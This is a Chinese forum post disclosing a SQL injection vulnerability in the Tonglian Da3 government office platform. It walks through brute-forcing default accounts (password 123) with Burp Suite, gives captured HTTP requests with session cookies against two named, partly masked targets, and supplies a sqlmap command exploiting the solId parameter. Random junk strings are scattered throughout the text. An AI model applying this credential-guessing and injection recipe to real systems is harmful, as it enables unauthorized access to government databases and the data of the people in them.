找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1577|回复: 0
打印 上一主题 下一主题

同联Da3协同办公平台前台通用sql injection漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:15:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

& e1 V$ }8 r( K! N2 k A+ k" t
5 H- U ]. F- X) z6 c5 Y% S ^

8 H9 l- o5 y- [

3 J" U: d% H$ {8 x f- s 平台简介: `9 ?$ O! t* B- _1 }% K& H9 t

8 J7 Z- b4 w/ v! W- H

* ?! P0 F+ P4 e8 z   8 L& W5 q+ A% M# p6 }1 a

5 w7 o, m, ]1 r/ M C* K

' A4 _6 q7 w- d4 s1 i 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
& L$ K) p/ P! R Y 同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
% i$ G* @5 [" U/ g% w% q' N8 f同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!7 [# T q$ f. `) z8 ]2 f

- \2 a( d( [! R& E

, {7 e( Q A$ W2 m   - R+ i1 {/ W" \2 m# v

, @5 z# V5 k1 Y! }$ O& f( ^

. V- z7 G0 w, t 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址: + {" s! P( k9 R6 c

2 o$ o6 x" v! V5 n- H Q8 H

) n$ A8 b9 S9 C% e- k5 \" d% H   5 R+ ^3 J6 @- M! G2 R

+ X9 L0 w% \0 ~( [7 o& J, x

+ e; P. ^5 {! H http://1.1.1.1:7197/cap-aco/#(案例2-), f) `+ P' @- @

: o O6 K( T- k4 ]. t; C# v Y

3 ?* c, l" }1 w% {" F, V http://www.XXOO.com (案例1-官网网站) # J: m: t1 r6 O2 B1 p/ |

/ q8 S, W8 H3 z( C9 d; ]- S& U8 W; f0 \3 @

$ I S8 a4 I7 k' X+ ]: h; k4 Y   - H4 {) L [( Y- p7 j

1 h6 p+ S! e; H

. r7 H/ @4 Y7 T4 `- P 漏洞详情: ( e) }+ Y- I$ ]& D) s" [% ], I0 r0 G# B

$ u. I8 ^3 J/ l! f H

; I6 z8 z( s8 Z  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试& X2 ?# Y' @, e( F2 h3 _/ R5 Q1 k

" n! j' s, N4 l6 r$ b

. D2 W/ h5 X' M/ q+ }' R      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图: H/ w" a4 L1 B) \" V- A

' x K; F9 @) o, J

6 O: Q$ X$ t5 K( n; o( O   . J) z9 ^# t" Z' u4 I1 t( _8 m2 t

' p# f6 w& i e4 C9 ~* r; h

* R8 s( S( Q; S% o& I   & R: S+ Z% |* _& t

+ e1 [( G7 B4 q

& G3 D) V0 _2 Z status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:7 E& i4 }) ?7 D

$ ^) _+ f3 H9 ]

& C% o" t, l' U: v4 q) C 1、案例1-官方网站 : v% W% p) O- A, G4 |) h( f

# W9 b( f+ u- p2 r1 U

8 w' \/ ~8 w" ~4 m7 H! z GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1& Q) H* M4 D( s5 q' ~- p7 J$ c

/ a7 m+ ]4 y% ^* }5 `

( o ^3 k. y- k' Y+ t }" H. t Host: www.XXOO.com $ ?. ^* d) k0 D2 R

# B( L4 t% M- [7 ~$ Z( r6 q

; S$ S! |* O. o4 X P/ [: h Proxy-Connection: Keep-Alive5 j6 V# |9 N' y# R( f; C

( o9 A2 q' O6 S1 I8 [) a% v& o& A

8 W4 F6 s0 R8 @+ A Accept: application/json, text/javascript, */*; q=0.01# Q8 C/ `3 r& d3 e2 K- F

D, V/ q% }+ \3 G7 u

' X% P' P$ ?) ]# z. o' i: m Accept-Language: zh-CN! c5 f( e: n0 c3 J

6 q& K$ F7 l. b, C7 y1 D5 [+ S7 D8 c

$ ?1 z6 f% S) r" }* z9 t$ z Content-Type: application/json * o. p7 G: }- |% t; n

; o2 K# ]4 l# t: t5 F

/ I! B+ g/ N) M- E2 k' z+ q User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko6 W8 c' V( H+ m, q

6 t, c+ X5 f7 P# t

+ y6 z! ]+ T& E& j, \$ t X-Requested-With: XMLHttpRequest * T' c1 Z# _; k& E0 v% A

* ]) y. K* c! r& h1 |1 n. U) Q5 ~

+ q. N6 w) ~* b9 Y( z/ o Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M0027 a1 B& S) l) j2 S3 x

8 M+ Q) D% q% y9 f$ k+ f3 [

- o% v' F& u, q& v Accept-Encoding: gzip, deflate, sdch8 x+ ?: d( W' u' ?! e

; E+ s; M9 |1 B. I1 z

K7 P2 u' _( r( ` Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e & E( n, j4 Q6 x* `9 U+ p& ~( J O/ I

, F) ^2 a1 q- L4 B. \8 X5 A8 H

+ T% R$ T: N% D 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:2 r# v/ O, ^- w9 X

6 \7 j1 J) N( G+ L, O2 N

9 l" r3 J6 l' t   z0 P' g. g% z: a* Y

4 z) g% C, L; x! R+ \" v

& Q/ c/ V# O" v# T6 b  ( {7 u/ D4 j) W* a8 C: X7 |

- V/ G( u# u" m ?9 ~

x9 K9 {/ F) D) O  * V2 f2 U/ l5 {2 Q G0 S2 h

2 |# Z. l% |. k3 M* K( O+ {) |$ {

6 K6 [ u. Y7 i. U' P% [: o% ]   9 |1 L% E- {+ j3 D5 q

" U" J& U1 Q+ X, G

" k7 n1 i* l5 P! C4 _; b) \, D1 p* z   " O1 {3 w+ {% L8 u

% }, P- V$ f/ d, G+ S

6 m, ^/ P) ]8 b2 A k 2、案例2-某天河云平台- k4 {+ g) D2 ~; i" d+ h/ m: J& H

2 L. Z" X4 a' c! u @% x

2 m' }# [; S9 {2 a GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1 9 R7 v1 R8 b6 y; N0 F

V2 [3 `! a- o% k$ f! E

2 U; e) v9 \; c) {4 ]) t i+ F ^ Host: 1.1.1.:7197. H2 v3 b; h2 b

; w4 u- L9 E( ]$ G9 V/ i+ a5 y4 S, A

- e( @. x- g1 `+ P( ^" d Accept: application/json, text/javascript, */*; q=0.01 5 o T) N* N9 X$ u

3 d. u7 q/ O! k4 L- i( t; B* Q

1 @9 s7 g( T* o1 t X-Requested-With: XMLHttpRequest 9 ~% q* L8 ^7 i% l

7 ?8 r! H( k6 J/ v

7 ^: s" b. y; T! f2 Z0 g5 t0 n- O' o User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0 : i: C# b! h+ ]& }; G: R2 t

& ]' P- H( p+ |( x! p" t" y

( z4 ]* I6 U/ z6 \! {$ g Content-Type: application/json 1 Y) }$ {6 c! m

" J( F/ D; i9 N7 D1 E* i" G

9 W4 R+ b9 h4 B1 c3 h Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008 / s. _2 P* W: S! ?

" ]( Z- n* E, B# c

( M2 F; W, b1 Y. z7 s M! w Accept-Language: zh-CN,zh;q=0.8# G. J# C% L2 O- ?

]1 u, t: q8 j. O# Q' U: ]3 N

. @3 S6 A7 ]) ^% J# W; x Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=10 G- M" ~0 K8 b, y" a- j: T

8 Y% Q' g' x8 a4 c

% i6 C$ L" Z; D Connection: close ' N) `/ k& J4 d/ ? ^- y7 E$ D6 R4 ~

+ d5 S& ^3 `* x

; O! M- T, i' r/ E+ ^8 a 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: 1 n+ z0 Q# i5 [) h) o6 e

" i+ B" ^* L& N; M. Y' _: P) D/ t6 s' D

7 t- O ]" Z* M/ R$ d; g0 e" q7 {( P   ' x/ t0 ~7 V5 B* v8 R

, F) N7 H: W3 C7 _6 Z

3 x# M; }7 f2 P: v' L3 h' l" F
, ^ m" X4 a# g, B$ C

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表